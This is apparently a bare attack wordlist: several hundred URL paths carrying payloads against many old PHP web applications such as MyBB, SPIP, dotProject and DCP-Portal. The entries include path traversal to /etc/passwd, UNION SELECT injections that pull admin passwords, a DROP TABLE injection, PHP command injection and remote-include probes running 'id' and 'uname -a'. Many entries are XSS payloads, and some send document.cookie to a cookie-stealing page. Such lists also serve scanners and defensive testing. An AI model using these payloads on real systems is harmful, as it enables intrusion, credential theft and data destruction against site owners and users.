/phpXplorer/system/workspaces.php?sShare=../../../../../../../../etc/passwd%00&ref=1 
/rkrt_stats.php?refs,,Last_7,0,">[code] 
/index.php?act=login
/microblog/index.php?month=1&year=9999%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14/* 
/modules/links/index.php?search=[XSS]func=search_results 
/modules/content/search.php?func=results&search=[XSS]
/modules/content/search.php?search=[XSS]&func=results
/aoblogger/login.php
/aoblogger/create.php" method="post">
/folder/system/action.php?sShare=guest&sAction=
/phpXplorer/system/action.php?sShare=guest&sAction=
/phpXplorer/system/action.php?sShare=guest&sAction=
/eggblog/home/blog.php?id=
/eggblog/forum/topic.php?id=N
/viewprofile.php?id=999%20union%20select%201,2,3,4,5,6,7/*
/webspot/login.php
/index.php?discuss=SQL
/index.php?tim=SQL
/index.php?id=SQL
/index.php?words=%20&where=1&limit=40&last=SQL
/index.php?words=%20&where=1&limit=SQL
/index.php?words=&where=1&submitted=true&address=E-mail+Address&action=add&rate=5&id=(SQL)&article_rate=Rate
/ndex.php?id=-99 union select null,null,null,null,null,null,null,null,null from newsphp.pro/*
/index.php?tim=-1 union select null,null,null,null,null,null,null,null,null from newsphp.pro/* 
/emoblog/index.php? monthy=2006017'% 20union%20select% 201,2,3,4,5, 6,7,8,9,10/*#1
/emoblog/admin/index.php
/post.php?nickname="><script>alert('XSS')</script><!--
/post.php?topic=>"<br><iframe%20src=javascript
/usercp.php?action=notepad
/pixelpost/index.php? popup=comment&showimage=1
/chat/index.php?pseudo=><script>alert(navigator.appVersion)</script>&txtlen=500&smiley=1 
/minibloggie/login.php
/cheesyblog/archive.php? entry=1
/mybb/search.php?action=do_search&keywords=&postthread=1&author=imei&matchusername=1&forums=all&findthreadst=1&numreplies=&postdate=0&pddir=1&sortby="><script
/adonet/index.php?ando=comentarios&entrada=1'%20union%20select%201,2,3,4/* 
/sPaiz-Nuke/modules.php?name=Articles&file=search&query=[XSS]&type=articles&type=comments 
/pmwiki-2.1.beta20/pmwiki.php?GLOBALS&GLOBALS[FarmD]=http
/index.php?file=Members&letter=[XSS] 
/[path]/ashnews.php?page=showcomments&id=<script><script>alert(document.cookie)</script>
/[path]/ashnews.php?page=showcomments&id=[xss] 
/modules/Search/results.php?query=%3CIMG+SRC%3Djavascript%3Aalert%28String.fromCharCode%2888%2C83%2C83%29%29%3E 
/tts2/clients.php?mode=search&sid=<sidvalue>&contact_search=<script>alert('c')</script> 
/loginout.php?cmd=dir&cutepath=http
/index.php?referrer=9999999999'%20UNION%20SELECT%20password,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,
/szusermgnt/www/login.php
//wwww.example.com/forum.php3?id_article=1&id_forum=-1/**/UNION/**/SELECT%20pass%20from%20spip_auteurs/*
//wwww.example.com/forum.php3?id_article=-1/**/UNION/**/SELECT%20pass%20from%20spip_auteurs/* 
/index.php3?lang=">xss 
/showflat.php?Cat=&Number=19229%20UNION%20SELECT%201,2%20/*&page=0&view=collapsed&sb=5&o=&fpart=1 
/beehive/index.php?user_sess=k
/beehive/index.php?user_sess=1+MYFORUM 
/desktop.php?baccio=eyeOptions.eyeapp&a=eyeOptions.eyeapp&_SESSION[usr]=root&_SESSION[apps][eyeOptions.eyeapp][wrapup]=phpinfo(); 
/mybb/moderation.php?posts=[firstpid]|[secondpid]?[SQL]
/index.php?Page=definition&UID=2;[SQLINJECTION]
/index.php?Page=definition&UID=2;Drop Table Docs; -- 
/spip_rss.php?GLOBALS[type_urls]=/../ecrire/data/spip.log%00
/spip_acces_doc.php3?id_document=0&file=<?system($_GET[cmd]);?>
/spip_rss.php?cmd=ls%20-la&GLOBALS[type_urls]=/../ecrire/data/spip.log%00 
/examples/type/type.php?cpaint_response_type=%3Ciframe%20src=http
/guestbook.php?menuid=<script>alert('HELLO');</script>
/index.php?menuid=<script>alert(document.cookie);</script>
/inhalt.php?menuid=<script>alert(document.cookie);</script>
/forum.php?menuid=<script>alert('HELLO');</script>
/kontakt.php?menuid=<script>alert('HELLO');</script> 
/show_archives.php?template=/../../[local-file]%00 
/addressbook.update.phpcmd=remove&contactgroupid=1%20--%20");phpinfo();@ob_start("&submit=1&contactcheck[]=1&con
/folders.update.php?cmd=mark&folderid=0%20--%20%22);phpinfo();@ob_start(%22
/index.php/%22%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E 
/docs/index.php?lang=/../../../../../../../../../../test
/install/install.php?language=/../../../../../../../test
/install/sec_stage_install.php?whatlang=1&language=/../../../../../../../test
/readfolder.php?path=[path]&ext=[extension]
/index.php?bgcol=[input]
/admin/upload.php?path=../[foldername]
/search.php?q=[XSS]
/index.php HTTP/1.1
/u2u.php?action=send&username=%22%3E%3Ciframe%3E
/nuke78/?pagetitle=w00t></title></head><body>test
/"<script>alert(123)</script>"
/search.php?debug=&help=&query=<script>alert("XSS Vulnerability")</scri
/index.php?category=1%20or%201=2
/index.php?id=0%20or%201=2
/modules/projects/gantt.php?dPconfig[root_dir]=[REMOTE INCLUDE]
/includes/db_connect.php?baseDir=[REMOTE INCLUDE]
/includes/session.php?baseDir=[REMOTE INCLUDE]
/modules/projects/gantt2.php?dPconfig[root_dir]=[REMOTE INCLUDE]
/modules/projects/vw_files.php?dPconfig[root_dir]=[REMOTE INCLUDE]
/modules/admin/vw_usr_roles.php?baseDir=[REMOTE INCLUDE]
/modules/public/calendar.php?baseDir=[REMOTE INCLUDE]
/modules/public/date_format.php?baseDir=[REMOTE INCLUDE]
/modules/tasks/gantt.php?baseDir=[REMOTE INCLUDE]
/modules/messages/pmlite.php?send=2&to_userid=-1%20union%20%20%20%20select%20pass%20from%20runcms_users%20where%20level=5
/modules/messages/pmlite.php?send=2&to_userid=-1/**/union/**/select/**/uname/**/from/**/runcms_users%20where%20level=5/*hamid-network-security-team-http
/view_all_set.php?type=1&handler_id=1&hide_status=[XSS]
/view_all_set.php?type=1&handler_id=[XSS]
/view_all_set.php?type=1&temporary=y&user_monitor=[XSS]
/view_all_set.php?type=1&temporary=y&reporter_id=[XSS]
/view_all_set.php?type=6&view_type=[XSS]
/view_all_set.php?type=1&show_severity=[XSS]
/view_all_set.php?type=1&show_category=[XSS]
/view_all_set.php?type=1&show_status=[XSS]
/view_all_set.php?type=1&show_resolution=[XSS]
/view_all_set.php?type=1&show_build=[XSS]
/view_all_set.php?type=1&show_profile=[XSS]
/view_all_set.php?type=1&show_priority=[XSS]
/view_all_set.php?type=1&highlight_changed=[XSS]
/view_all_set.php?type=1&relationship_type=[XSS]
/view_all_set.php?type=1&relationship_bug=[XSS]
/manage_user_page.php?sort=[XSS]
/mybb/private.php?action=do_folders&folder['<strong>sql</strong>]=nomatter
/mybb/private.php?action=do_folders&folder['<strong>sql</strong>]
/mybb/private.php?action=do_stuff&delete=1&check['<strong>sql</strong>]
/show.php3?month=99%20union%20select%201,2,3,4,5/*
/mybb/managegroup.php?gid=8&action=do_joinrequests&request[sql]=accept
/mybb/managegroup.php?gid=8'sql&action=joinrequests
/mybb/managegroup.php?gid=8sql&action=do_manageusers
/mybb/managegroup.php?gid=8'sql
/mybb/managegroup.php?gid=8'//<script>alert(1)</script>
/edit/Comment
/preferences.personal.php?newid=[code]
/frameset.php?vwebmailsession=&rframe=[url]
/timetracking/edituser.php? num=[userid]
/admin.php?module=NS-Languages&op=missing&language=">[code]
/admin.php?module=NS-Languages&op=translation&language=[code]
/admin.php?module=NS-Languages&op=missing&language=[sql]
/public/modules/downloads/ratefile.php?lid={number}">[code]
/classifieds/index.php?inf=%3Cscript%3Ealert(document.cookie)%3C/script%3Ehttp
/classifieds/index.php?upperTemplate=%3Cscript%3Ealert(document.cookie)%3C/script%3E
/classifieds/index.php?otherTemplate=/../../../etc/passwd%00http
/classifieds/index.php?lowerTemplate=http
/index.php?name=Your_Account&error=1&uname=bGFsYWxh"><script>alert(document.cookie)</script>
/index.php?name=Your_Account&error=1"><script>alert(document.cookie)</script>&uname=bGFsYWxh
/index.php?name=Your_Account&profile=3"><script>alert(document.cookie)</script>
/index.php?name=Your_Account&error=1&uname=PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ+
/index.php?name=News&catid=1"><script>alert()</script>
/index.php?name=News&file=article&sid=7"><script>alert()</script>
/index.php?name=News&file=submit
/index.php?name=News&file=friend&sid=5"><script>alert()</script>
/index.php?name=Stories_Archive&sa=show_month&year=2005&month=11"><script>alert()</script>
/index.php?name=Stories_Archive&sa=show_month&year=2005"><script>alert()</script>> &month=11
/index.php?name=Stories_Archive&sa=show_all"><script>alert()</script>
/index.php?name=Web_Links&l_op=viewlink&cid=15&min=10&orderby=title%20ASC&show=0"><script>alert(document.cookie)</script>
/index.php?name=Web_Links&l_op=viewlink&cid=15"><script>alert()</script>
/index.php?name=Web_Links&l_op=toprated&ratenum=5&ratetype=percent"><script>alert()</script>
/index.php?name=Web_Links&l_op=viewlink&cid=15&orderby=titled"><script>alert()</script>
/index.php?name=Surveys&op=results"><script>alert()</script>pollid=3
/index.php?name=Surveys&op=results&pollid=5"><script>alert()</script>
/index.php?name=Downloads&c=1"><script>alert()</script>
/index.php?name=coppermine&file=thumbnails&album=1"><script>alert()</script>
/pathtocalendar/dropbase.php?tabls=' or 1=1 --
/[path]/html/error.php?html_error_occurred=<script>alert(document.cookie)</script>
/[path]/html/filter_prefs.php?html_filter_select=<script>alert(document.cookie)</script>
/[path]/html/no_mail.php?html_no_mail=<script>alert(document.cookie)</script>
/[path]/html/html_bottom_table.php?page_line=<script>alert(document.cookie)</script>
/[path]/html/html_bottom_table.php?prev=<script>alert(document.cookie)</script>
/[path]/html/html_bottom_table.php?next=<script>alert(document.cookie)</script>
/oi/index.php
/cubedir/admin/includes/rte/editor/filemanager/browser/default/connectors/php/connector.php?Command=FileUpload&Type=File&CurrentFol
/jgs_galerie_slideshow.php?sid=&katid=&userid=[XSS]
/jgs_galerie_slideshow.php?sid=&katid=[XSS]&userid=
/jgs_galerie_scroll.php?userid=[XSS]
/reviews.php?op=reviews&letter=[XSS]
/download.php?sortby=&dcategory=[XSS]&sortby=
/spiddir/scan_lang_insert.php?lang=../../../../../../../../etc/passwd%00
/files/myforms/process3.php?formname=attack.php%00*name[0]=
/basket.php?action=addex&id=[SQL]
/basket.php?action=[SQL]
/basket.php?action=addr&id=[SQL]
/cat.php?do=cat&page=1&id=[SQL]
/cat.php?do=cat&page=[SQL]
/nuke78p/?kala=p0hh+UNION+ALL+SELECT+1,2,3,4,5+FROM+ppp/%2aad_click
/nuke78/?kala=p0hh+UNION+ALL+SELECT+1,2,3,pwd,5+FROM+nuke_authors/%2a
/news.php?page=|sql
/21new/galerie_index.php?action=count&gal_catid=5&tcase=2&gal_id=35&userid=1&username="><script>alert(document.cookie)</script>
/21new/galerie_data/galerie_onfly.php?abild=9997_mr2_2f2f_blue.jpg&width=600&show=2&inpic=Patriotic%20Hackers%20
/awb/admin/index.php HTTP/1.1
/fastlinks.php?catid=[SQL]
/catogary.php?catid=[SQL]
/path/?dir=[sql]
/path/?dir=home&page_id=[sql]
/path/?dir=[xss]
/path/?dir=home&page_id=[xss]
/path/mailto.php?userid=[xss]
/index.php?page="><alert(document.cookie);</script>
/inc_header.php?gTopNombre=?><script>alert(document.cookie)</script>
/script_path/sol_menu.php?kul_adi="><script>alert(document.cookie)</script>
/sol_menu.php?uye_klasor=http
/?pg=evilcode?&cmd=id
/poems/poems.php?division=diwan&action=view&offset=25&id=[sql]
/Nexus/forgotten_password.php) 
//forum/profile.php?do=editpassword
 example@www.example.com�><script>alert(1)</script>.nomatt
/index.php?action=Information&informationID=[SQL]
//index.php?action=DisplayOverviewproduct&ParentCategory=[SQL]
/?pg=http
/vz/show.php?UserID=1&MainID=[SQL]&SubjectID=1
/vz/comment.php?UserID='>XSS 
/vz/contact.php?UserID='>XSS
/includes/tellafriend.php?about=game&gamename=%3CSCRIPT%20SRC=http
/admin/loginbox.php?loginstatus=1&login_status=%3CSCRIPT%20SRC=http
/index.php?action=tradelinks&submissionstatus=%3CSCRIPT%20SRC=http
/includes/browse.php?cell_title_background_color=%22%3E%3CSCRIPT%20SRC=http
/includes/browse.php?browse_cat_id=1&browse_cat_name=%3CSCRIPT%20SRC=http
/includes/displaygame.php?filetype=1&gamefile=%22%3E%3CSCRIPT%20SRC=http
/wbb/acp/misc.php?sid=yoursessionid&action=workingtop&taskname=Backup%20Database&percent=<script>aler(document.cookie)</script>
/index.php?subaction=showcomments&id=[number]&archive=&start_from=&ucat=&">[code]
/index.php?act=blog&blogid=../somefile
/index.php?act=../somefile
/path/index.php?page="><script>alert(document.cookie)</script>
/path/dv_gbook.php?d=0&f='"><script>alert(document.cookie)</script>
/[target]/modules/downloads/bigshow.php?id=[url of an image]'>[code]
/index.php?showtopic=208510&pid=1366158&st=-1[sql]&#entry1366158
/[phorum_path]/common.php?PHORUM[http_path]=[evil_scripts]
/login.php?message=%3CSCRIPT%20SRC=http
/iframe.php?site=%3C/title%3E%3C/head%3E%3Cscript%20src=http
/loudblog/podcast.php?id=[SQL]
/loudblog/index.php?template=../../../loudblog/custom/config.php%00
/loudblog/loudblog/index.php?page=/../../../audio/cmdphp.mp3%00
/admin/deleteuser.php?user=<script%20src=http
/admin/viewuser.php?hits=<script%20src=http
/messanger.php?mess=%3Cscript%20src=http
/messanger.php?p=MSN&user=%3Cscript%0src=http
/messanger.php?p=YIM&user=%3Cscript%0src=http
/messanger.php?p=ICQ&user=%3Cscript%0src=http
/messanger.php?p=AIM&user=%22%3E%3C/head%3E%3Cbody%3E%3Cscript20src=http
/mybloggie213beta/admin.php?mode=upload&del=xss_string
/mybloggie213beta/admin.php?mode=upload&message=xss_string
/mybloggie213beta/index.php?mode=delcom&confirmredirect="><script>alert('xss_string')</script>
/mybloggie213beta/index.php?mode=delcom&comment_id=1&redirect=adm&confirm=yes" method="post">
/mybloggie213beta/index.php?mode=delcom&comment_id=1" method="post">
/mybloggie213beta/admin.php?mode=deluser&id="><script>alert('xss_string')</script>
/mybloggie213beta/admin.php?mode=addcat&errormsg=<script>alert('xss_string')</script>" method="post">
/mybloggie213beta/admin.php?mode=edituser&id=1&pass=yes&errormsg=<script>alert('xss_string')</script>" method="post">
/mybloggie213beta/admin.php?mode=adduser&errormsg=<script>alert('xss_string')</script>" method="post">
/mybloggie213beta/admin.php?mode=editcat&errormsg=<script>alert('xss_string')</script>" method="post">
/mybloggie213beta/admin.php?mode=add" method="post">
/mybloggie213beta/admin.php?mode=delcat&cat_id="><script>alert('xss_string')</script>
/mybloggie213beta/admin.php?mode=del&post_id="><script>alert('xss_string')</script>
/dcp-portal611/index.php?page=documents&dl=xyz&its_url=xyz.html"><script type="text/javascript">document.location="http
/dcp-portal611/index.php?page=send_write&url=xyz.html"><script type="text/javascript">document.location="http
/dcp-portal611/calendar.php?subject_color="><script>document.location="http
/dcp-portal611/calendar.php?images="><script>document.location="http
/dcp-portal611/calendar.php?day=<script>document.location="http
/dcp-portal611/calendar.php?show=full_month&month=02&day="><script>document.location="http
/dcp-portal611/calendar.php?year=<script>document.location="http
/dcp-portal611/forums.php?action=board&bid=1' method="post">
/stealcookie.php?"+document.cookie</script>' />
/dcp-portal611/forums.php?action=board&bid="><script>document.location="http
/dcp-portal611/forums.php?action=addtopic&bid=1&replying_msg=<script>document.location="http
/dcp-portal611/forums.php?action=addtopic&bid=1' method="post">
/stealcookie.php?"+document.cookie</script>' />
/dcp-portal611/forums.php?action=addtopic&bid=1' method="post">
/stealcookie.php?"+document.cookie</script>' />
/dcp-portal611/forums.php?action=addtopic&bid=1&mid="><script>document.location="http
/dcp-portal611/forums.php?action=savemsg' method="post">
/stealcookie.php?"+document.cookie</script>' />
/dcp-portal611/inbox.php?action=send' method="post">
/stealcookie.php?"+document.cookie</script>' />
/dcp-portal611/inbox.php?action=send' method="post">
/stealcookie.php?"+document.cookie</script>' />
/dcp-portal611/inbox.php?action=delete&subject="><script>document.location="http
/dcp-portal611/inbox.php?action=delete&message=">&lt;/textarea&gt;<script>document.location="http
/dcp-portal611/lostpassword.php?subject_color="><script>document.location="http
/dcp-portal611/lostpassword.php?email="><script>document.location="http
/dcp-portal611/mycontents.php?action=content&c_name="><script>document.location="http
/dcp-portal611/mycontents.php?action=content&content_inicial=&lt;/textarea&gt;<script>document.location="http
/dcp-portal611/mycontents.php?action=content&c_name="><script>document.location="http
/dcp-portal611/mycontents.php?action=addnews&c_name="><script>document.location="http
/dcp-portal611/mycontents.php?action=addnews&content_inicial=&lt;/textarea&gt;<script>document.location="http
/dcp-portal611/mycontents.php?action=addnews&mode=write&dcp_editor_contingut_html=xyz&c_name=<script>document.location="http
/dcp-portal611/mycontents.php?action=addanns&c_name="><script>document.location="http
/dcp-portal611/mycontents.php?action=updatecontent&cid="><script>document.location="http
/dcp-portal611/mycontents.php?action=updatecontent&cid=1&mode=write&c_image_name=xyz&c_name="><script>document.location="http
/txtforum104/index.php?rand5="><script>alert('xss_string')</script>
/txtforum104/new_topic.php?r_username='><script>alert('xss_string')</script>
/txtforum104/new_topic.php?r_loc='><script>alert('xss_string')</script>
/txtforum104/profile.php?mode=viewprofile&nick=admin&r_num=<script>alert('xss_string')</script>
/txtforum104/profile.php?mode=editprofile&r_family_name="><script>alert('xss_string')</script>
/txtforum104/profile.php?mode=editprofile&r_icq="><script>alert('xss_string')</script>
/txtforum104/profile.php?mode=editprofile&r_yahoo="><script>alert('xss_string')</script>
/txtforum104/profile.php?mode=editprofile&r_aim="><script>alert('xss_string')</script>
/txtforum104/profile.php?mode=editprofile&r_homepage="><script>alert('xss_string')</script>
/txtforum104/profile.php?mode=editprofile&r_interests="><script>alert('xss_string')</script>
/txtforum104/profile.php?mode=editprofile&r_about="&lt;/textarea&gt;<script>alert('xss_string')</script>
/txtforum104/profile.php?mode=editprofile&selected1="><script>alert('xss_string')</script>
/txtforum104/profile.php?mode=editprofile&selected0="><script>alert('xss_string')</script>
/txtforum104/profile.php?mode=editprofile&signature_selected1="><script>alert('xss_string')</script>
/txtforum104/profile.php?mode=editprofile&signature_selected0="><script>alert('xss_string')</script>
/txtforum104/profile.php?mode=editprofile&smile_selected1="><script>alert('xss_string')</script>
/txtforum104/profile.php?mode=editprofile&smile_selected0="><script>alert('xss_string')</script>
/txtforum104/profile.php?mode=editprofile&ubb_selected1="><script>alert('xss_string')</script>
/txtforum104/profile.php?mode=editprofile&ubb_selected0="><script>alert('xss_string')</script>
/txtforum104/reply.php?quote=&lt;/textarea&gt;<script>alert('xss_string')</script>
/txtforum104/reply.php?tid="><script>alert('xss_string')</script>
/txtforum104/view_topic.php?page=27&tid='><script>alert('xss_string')</script>
/txtforum104/view_topic.php?print_adminJS=1&tid="><script>alert('xss_string')</script>
/txtforum104/view_topic.php?sticked=<script>alert("xss_string")</script>' method="post">
/txtforum104/view_topic.php' method="post">
/txtforum104/view_topic.php?page=-1&tid=xss_string
/txtforum104/view_topic.php?tid=xss_string
/txtforum104/login.php' method="post">
/>
/index.php?page=Home&from=[XSS]
/index.php?page=Home&help=[XSS]
/index.php?page=Home&from=Home&help=[XSS]
/login.php?page=Home&action=Login&action=[XSS]&debug=1&help=true&username=1&password=1
/login.php?page=[XSS]&action=Login&action=Login&debug=1&help=true&username=1&password=1
/login.php?page=Home&action=Login&action=Login&debug=[XSS]&help=true&username=1&password=1
/login.php?page=Home&action=Login&action=Login&debug=1&help=[XSS]&username=1&password=1
/login.php?page=Home&action=Login&action=Login&debug=1&help=true&username=[XSS]&password=1
/login.php?page=Home&action=Login&action=Login&debug=1&help=true&username=1&password=[XSS]
/pageindex.php?nothing=nothing&help=[XSS]
/recentchanges.php?nothing=nothing&help=[XSS]
/index.php?page=evilcode?&cmd=id
/vcard/create.php?card_id='><script>alert(document.cookie)</script>
/vcard/create.php?uploaded='><script>alert(document.cookie)</script>
/vcard/create.php?card_fontsize='><script>alert(document.cookie)</script>
/vcard/create.php?card_color='><script>alert(document.cookie)</script>
/path/wmview.php?ArtCat="><script>alert(/R00T3RR0R/)</script>
/path/footer.php?ctrrowcol="><script>alert(/R00T3RR0R/)</script>
/path/wmcomments.php?act=vi&CmID=2&ArtID="><script>alert(/R00T3RR0R/)</script>
/forum.php?postid=999% 20or%201
/post.php?board=1&reply=999'% 20union%20select% 201,2,3,4,5, 6,7,8,9,10, 11,12,13,14, 15,16,17,18, 19/*
/dsdownload/downloads.php? category=999'% 20union%20select% 206,2,3,4,5, 1,7,8/*
/path/index.php/"><script>alert(/Soot/)</script>
/oxynews/index.php?oxynews_comment_id=[sql]
/index.php?set_theme=%3Cscript%3Ealert(XSS);%3C/script%3E
/forum/index.php?act=Search&nav=au&CODE=show&searchid=5f25843edb0242889889796819a2b367&search_in=ooo&result_type='><script>alert(document.cookie)</script>
/forum/index.php?act=Search&nav=au&CODE=show&searchid=5f25843edb0242889889796819a2b367&search_in='><script>alert(document.cookie)</script>&result_type=posts
/forum/index.php?act=Search&nav='><script>alert(document.cookie)</script>
/forum/index.php?showtopic=1&st='><script>alert(document.cookie)</script>
/forum/index.php?act=calendar&code=birthdays&y=[any year]&m='><script>alert(document.cookie)</script>&d=[any day]
/forum/index.php?act=calendar&code=birthdays&y='><script>alert(document.cookie)</script>&m=[any month]&d=[any day]
/forum/index.php?act=calendar&code=birthdays&y=[any year]&m=[any month]&d='><script>alert(document.cookie)</script>
/forum/index.php?act=Print&client=printer&f=1&t='><script>alert(document.cookie)</script>
/forum/index.php?act=Mail&CODE=00&MID='><script>alert(document.cookie)</script>
/forum/index.php?act=Help&CODE=01&HID='><script>alert(document.cookie)</script>
/forum/index.php?act=Members&max_results=10&sort_key=posts&sort_order='><script>alert(document.cookie)</script>
/forum/index.php?act=Members&max_results='><script>alert(document.cookie)</script>&sort_key=posts&sort_order=desc
/forum/index.php?act=Members&max_results=10&sort_key='><script>alert(document.cookie)</script>&sort_order=desc&sort_order=desc
/path/calendar.php?op=cal&month=3&year="><script>alert(/Soot/)</script> 
/path/calendar.php?op=cal&month="><script>alert(/Soot/)</script>&year=2006 
/path/calendar.php?op=day&ask=nd&da=28&mo=3&ye=2006&next="><script>alert(/Soot/)</script> 
/path/calendar.php?op=day&ask=nd&da=28&mo=3&ye=2006&next=2&prev="><script>alert(/Soot/)</script>
/filebase_redirect.php?fid='<script>location.href='http
/music/index.php?action=top&show=5&type=[SQL] 
/music/index.php?action=top&show=[SQL]&type=Artists
/music/index.php?id='><script>alert(document.cookie)</script> 
/music/index.php?action=top&show=5&type='><script>alert(d ocument.cookie)</script> 
/music/index.php?action=top&show='><script>alert(document .cookie)</script>&type=Artists 
/music/cart/cart.php?message1='><script>alert(document.cookie) </script> 
/music/cart/cart.php?message='><script>alert(document.cookie)</script> 
/friend.php?op=FriendSend&sid=-1%20Union%20select%20name%20From%20users%20where%20uid=1
/friend.php?op=FriendSend&sid=-1%20Union%20select%20pass%20From%20users%20where%20uid=1
/article.php?sid=[sql]
/phplive/js/status_image.php?base_url=<script>alert(document.cookie)</script>
/img.php?i=[CODE]
/img.php?i=[CODE]
/adMan/advertiser/viewStatement.php?start_date_date_month=03&start_date_date_day=01&start_date_date_year=2008&start_date_time_hour=12&start_date_time_min=00&start_date_time_amPm=AM&end_date_date_month=&end_date_date_day=&end_date_date_year=&end_date_time_hour=&end_date_time_min=&end_date_time_amPm=&_submit=&transactions_offset=[SQL]
/index.php?page=<script>alert(document.cookie)</script>
/[path]/index.php?page=evilcode.txt?&cmd=id
/[path]/index.php?page=<script>alert(document.cookie)</script>
/index.php?file=Calendar&m=[sql]&y=2006
/lesson/print.php?lessid=-1%20union20select20null,null,null,ModName,null,ModPassword,null,ModPassword,null,ModPassword,null,null,null,null%20FROM%20modretor
/print.php?cmd=log&entry=999'% 20union%20select% 201,2,3,4,5, 6/*
/mail.php? cmd=remove&email=111' or 1/*
/?mois=&annee=&date=[sql]
/dslogin/index.php
/supporttrio/index.php?action=kb&article=[r0t]
/supporttrio/index.php?action=kb&print=[r0t]
/supporttrio/modules/KB/pdf.php?category=[r0t]
/track.php?person=00001&name=[code]&email=1&action=sub&submit=Wy%B6lij
/mod_print.php?mod=helpdesk&sb=&so=&fb=&fs=[XSS]
/mod.php?mod=orders&mode=view&sb=1&so=A&fb=&fs=[XSS]
/shared_order.php?sharedPlanID=1[XSS]
/dedicated_order.php?dedicatedPlanID=1[XSS]
/customers/server_management.php?plan_id=1[XSS]
/online.php?&title=D3vil-0x1</title><XSS>CODE</XSS>
/download.php?action=byuser&userid=1&title=D3vil-0x1</title><XSS>CODE</XSS>
/ViewDay.html?start=2453810&&integral=0&style_sheetuserStyle.css&dropdown=1&show_stop=0&show_resources0&calendar_id=[code]
/ViewDay.html?start=2453810&&integral=0&style_sheet=[code]
/ViewDay.html?start=[code]
/ViewSearch.html?integral=0&show_stop=0&show_resources=0&criteria=calendar_id%3D34&txtSearch=[code]
/ViewSearch.html?integral=0&show_stop=0&show_resources=0&criteria=calendar_id%3D34&txtSearch=&opgFields1&opgSearch=[code]
/ViewSearch.html?integral=0&show_stop=0&show_resources=0&criteria=calendar_id%3D34&txtSearch=&opgFields=[code]
/ViewYear.html?n=1&dropdown=1&integral=0&approved=1&show_stop=0&show_resources=0&calendar_id=[code]
/ViewYear.html?n=1&dropdown=1&integral=0&approved=[code]
/ViewCal.html?item_type_id=[code]
/ViewWeek.html?year=2006&week=[code]
/index.php?t=kbase&act=kans&id=[sql]
/carnet.php?view_cat=&all_lines=true&motclef=[sql]
/carnet.php?view_cat=2&nbr_line_view=[sql]
/contact_view.php?id_contact=[sql]
/login.php?m=[xss]
/vnews/news.php? co=show&news=99'% 20union%20select% 201,2,3,4,5, 6/*&nom=1
/index.php?from=[sql]&into=[sql]&value=1&action=calculate
/index.php?action=edit&id=[sql]
/index.php?rub=http
/post.php?action=newthread&fid=[sql]
/[path]/index.php?page=evilcode.txt?&cmd=uname -a
/redcms/profile.php? id=99'% 20union%20select% 201,2,3,4,5, 6,7,8,9,10, 11,12,13,14, 15,161,7,18, 19,20/*
/topics.php?fid=3&limite=[sql]
/imagegallery/image_desc.php?id=[SQL]
/imagegallery/template.php?provided=[SQL]
/imagegallery/suggest_image.php?cid=[SQL]
/imagegallery/insert_rating.php?img_id=[sql]
/imagegallery/images.php?cid=[SQL]
/claroline/document/rqmkhtml.php?cmd=rqEditHtml&file=[file]
/claroline/document/rqmkhtml.php?cmd=rqEditHtml&file=[code]
/index.php?_path=../../.. /../../
/index.php?_path="><script>alert(document.cookie)</script>
/visview.php? a=c&cid=2916852'% 20union%20select% 201,2,3,4,5, 6/*
/[lucidcms_dir]/index.php?command=login'>[XSS_here]
/[lucidcms_dir]/index.php?i18n=cs_CZ&command=panel'>[XSS_here]
/forum.php?mineID=[SQL Injection]
/forum.php?action=view&id=1&cat_id=3&adminJump=D3vil-0x1[HTML - XSS ]
/forum.php?action=view&id=1&cat_id=3&forum_middle=D3vil-0x1[HTML - XSS ]
/members.php?action=changepass&form=D3vil-0x1[HTML - XSS ]
/members.php?action=edit&form=D3vil-0x1[HTML - XSS ]
/pm.php?action=reply&form=D3vil-0x1[HTML - XSS ]
/pm.php?action=sendmsg&form=D3vil-0x1[HTML - XSS ]
/mail.php?action=sendpage&form=D3vil-0x1[HTML - XSS ]
/mail.php?action=sendtome&form=D3vil-0x1[HTML - XSS ]
/mail.php?action=sendtousers&userid=1&form=D3vil-0x1[HTML - XSS ]
/area.View.action?areaID=[XSS]
/planning.View.action?time=[XSS]
/user.View.action?userID=[XSS]
/base/base_graph_main.php?back="><script>alert("780")</script><"
/base/base_stat_ipaddr.php?ip=1.1.1.1&netmask="><script>alert("780")</script><"
/base-snort/base_qry_alert.php?submit=<script>780</script>&sort_order=
/admin.php?action=full&id=-1 union select 1,2,3,4,5
/maxdev/index.php?module=Topics&func=display&topicid=0 AND 1=0
/maxdev/index.php?module=Topics&func=display&topicid=0 AND 1=1
/jupiter/index.php?n=modules/online&&a=1&language=1&layout=%3Ch1%3E%3Cmarquee%3Ealooo
/bitweaver/users/login.php?error=<h1><marquee>Test
/[path_to_bitweaver]/articles/index.php?feedback=<script>alert(document.cookie)</script>
/vbugs.php?do=list&s=&textsearch=&vbug_typeid=0&vbug_statusid=0&vbug_severityid=0&vbug_versionid=0&assignment=0&sortfield=lastedit&sortorder=%22%3Cscript%3Ealert('r0t')%3C/script%3E
/banniere/index.php?mode=view&save=1&size=&text=&banner=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&x=&y=&font=&RGBr=&RGBg=&RGBb=&angle=
/path/index.php?page=[xsscode]
/phpwebgallery_dir/category.php?cat=">[xss]
/phpwebgallery_dir/category.php?cat=">[xss]&num=0
/phpwebgallery_dir/category.php?cat=1&num=">[xss]
/phpwebgallery_dir/category.php?cat=">[xss]&search=date_available%3A2006-01-01
/phpwebgallery_dir/category.php?cat=1&search=">[xss]
/phpwebgallery_dir/picture.php?cat=1&image_id=1&slideshow=">[xss]
/phpwebgallery_dir/picture.php?cat=1&image_id=1&show_metadata=">[xss]
/phpwebgallery_dir/picture.php?cat=1&image_id=1&start=">[xss]
/[spip_dir]/spip_login.php3?url=[Evil_url]
/modules.php?warp=artikel&group=[SQL]
/modules.php?warp=artikel&group=&seite=[SQL]
/modules.php?warp=artikel&group=&seite=&id=[SQL]
/path/load.php?mod=pages&page="><script src=http
/path/load.php?mod=pages&page="><script>alert(/BiyoSecurityTeam/)</script>
/path/load.php?mod=pages&page="><script>alert(document.cookie)</script>
